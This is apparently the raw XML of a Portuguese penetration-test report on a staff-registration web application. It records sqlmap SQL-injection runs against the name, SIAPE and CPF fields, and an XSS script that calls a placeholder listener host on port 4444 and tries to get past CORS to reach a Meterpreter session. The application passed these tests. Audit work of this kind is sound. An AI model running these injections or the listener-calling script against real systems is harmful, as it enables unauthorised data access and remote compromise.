      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Data too long for column ‘id’ at row 1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Dessa forma foi possível identificar que o campo </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Siape</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, no banco de dados corresponde à coluna ‘id’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softHyphen/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="0048383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bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:proofErr w:type="gram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Usar a ferrament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realizar a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de injetar SQL na página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Primeiro, deve-se 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alvar a requisição POST capturada pela ferramenta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em um arquivo a parte para utilizar n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Sqlmap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posteriormente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15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Comando utilizado: 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F15F82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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>paramsTelaConsServidor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-p nome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F15F82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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>paramsTelaConsServidor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-p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>siape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15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -r </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>paramsTelaConsServidor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-p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cpf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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dbms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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63043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comando “-r” informa que as instruções do ataque devem ser carregadas no arquivo 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p</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>aramsTelaConsServidor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63043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p” indica o parâmetro que deve ser injetado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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4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“--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current-db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” comando utilizado para descobrir qual o banco da aplicação alvo.</w:t>
      </w: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F15F82" w:rsidRDefault="000D038A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A8D3C47" wp14:editId="674E35D9">
            <wp:extent cx="5400040" cy="16567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7(Editada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E4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26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– Dados da requisição via POST capturada pel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Burp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Suite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ab/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o sistema realize o tratamento sobre os parâmetros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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O sistema passou nos testes</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Os parâmetros “</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nome</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”, “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>siape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>” e “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cpf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” não são injetáveis conform</w:t>
      </w:r>
      <w:r w:rsidR="00605CFE" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e mostram as figuras 27, 28 e 29</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w: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E74BFAA" wp14:editId="1FE9C3F0">
            <wp:extent cx="5400040" cy="41154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5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Figura 27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Resultado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de Injeção SQL no campo </w:t>
      </w:r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Nom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60E863B" wp14:editId="5640808A">
            <wp:extent cx="5400040" cy="398653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777DDF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>Figura 28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- Resultado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de Injeção SQL no campo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Siape</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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      </w:t>
      </w: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9018AF" wp14:editId="4A0FB04A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9A2041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</w:t>
      </w:r>
      <w:r w:rsidR="00777DDF" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gura 29</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - 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Resultado </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"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de Injeção SQL no campo </w:t>
      </w:r>
      <w:r w:rsidR="00E77F75" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CPF.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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 xml:space="preserve">Iteração </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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5.1 Explorar XSS – Tela Cadastro Servidor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Tarefa realizada dia </w:t>
      </w:r>
      <w:r w:rsidR="00E52417" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>19/05/16</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="005A089C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Duração total das sessões executadas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>: 1 hora.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRPr="00F15F82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Objetivo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Utilizar o campo de “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nome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” para tentar incluir um script malicioso que consiga burlar o filtro CORS e realizar uma chamada a um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listen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stas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para executar um ataque usando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Meterprete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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="0048383A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</w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82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Para burlar o filtro CORS, do navegador </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>é</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> necessário que sejam incluídas algumas credenciais no cabeçalho da requisição. O script abaixo simula uma </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sessão de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de requisição credenciada por meio do atributo “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F82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Pr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">É esperado que a aplicação </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>impeça</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> a conexão.</w:t>
      </w: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2417" w:rsidRPr="00F15F82" w:rsidRDefault="00E5241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81DA5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lastRenderedPageBreak/>
        <w:t xml:space="preserve">O código abaixo cria um objeto do tipo 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e inicia uma chamada Ajax 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dotipo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GET par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porta 4444 de forma assíncrona. Porém, aqui é utilizado o atributo “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F82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Pr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para burlar o filtro de CORS do navegador.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00881DA5" w:rsidRPr="00F15F82" w:rsidRDefault="00881DA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&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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script</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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&gt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r = </w:t>
      </w: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new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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spell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(</w:t>
      </w:r>
      <w:proofErr w:type="gram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); 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r.open</w:t>
      </w:r>
      <w:proofErr w:type="spell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(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1C21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1C21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GET"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,’</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1155CC"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1155CC"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>://IP_do_servidor:4444’,false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)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r.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E1E7FF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>withCredentials</w:t>
      </w:r>
      <w:proofErr w:type="spell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 = true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15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="6A737C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r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.send</w:t>
      </w:r>
      <w:proofErr w:type="spell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(</w:t>
      </w:r>
      <w:proofErr w:type="gram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);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F06E4" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/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</w:pPr>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="6A737C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="008719F1"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script&gt;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conexão não seja aberta.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</w:pP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  <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7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8719F1" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O sistema passou nos testes</w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. O comando </w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="00F15F82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="008719F1" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>withCredentials</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008719F1" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> encontra-se depreciado e a conexão não ocorreu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77F75" w:rsidRPr="00F15F82" w:rsidRDefault="00E77F7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77F75" w:rsidRPr="00F15F82" w:rsidRDefault="00E77F7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CAE520" wp14:editId="4DC4DDE2">
            <wp:extent cx="5400040" cy="6496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30</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Console do navegador indicando a </w:t>
      </w:r>
      <w:r w:rsidR="00751591" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>depreciação</w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> do atributo </w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008719F1" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>withCredencials</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008719F1" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRPr="00F15F82" w:rsidRDefault="00751591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C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="0048383A" w:rsidP="00AC10DC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Sessão de teste</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F8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8C6DC7" w:rsidRPr="00F15F82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</w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008719F1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Para burlar o filtro CORS, deve ser </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>adicionado ao cabeçalho da requisição uma instrução que simule uma assinatura válida para o navegador</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Para esse fim, foi utilizado a instrução “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>setRequestHeader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para adicionar as credenciais maliciosas ao cabeçalho.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00881DA5" w:rsidP="00AC10D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O código abaixo cria um objeto do tipo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F82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proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> e inicia uma chamada Ajax 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dotipo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GET para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IP_do_servidor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 na porta 4444 de forma assíncrona.</w:t>
      </w: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hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w: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&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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script</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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&gt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r = </w:t>
      </w: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  <w:lang w:val="en-US"/>
        </w:rPr>
